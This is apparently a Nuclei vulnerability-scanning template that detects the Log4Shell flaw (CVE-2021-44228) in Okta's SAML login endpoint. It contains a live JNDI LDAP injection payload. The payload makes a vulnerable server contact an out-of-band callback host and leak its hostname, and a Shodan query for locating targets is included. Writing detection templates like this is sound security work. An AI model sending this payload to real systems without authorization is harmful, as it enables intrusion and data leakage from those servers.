id: okta-log4j-rce info: name: Okta - Remote Code Execution (Apache Log4j) author: shaikhyaser severity: critical description: | Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices. reference: - https://sec.okta.com/articles/2021/12/log4shell classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: max-request: 1 shodan-query: title:"Okta" tags: cve,cve2021,rce,jndi,log4j,okta,oast,kev variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' str: "{{rand_base(5)}}" http: - raw: - | GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request # digest: 4b0a00483046022100ee956cb9b2cf22db0609ad860c91e7503fbb11d76d4312c22bcf0b651d52799d022100996f4e99b0f7b0e23f34bd9c71b64dd69011313bc32f7ebe172171395c479651:922c64590222798bb761d5b6d8e72950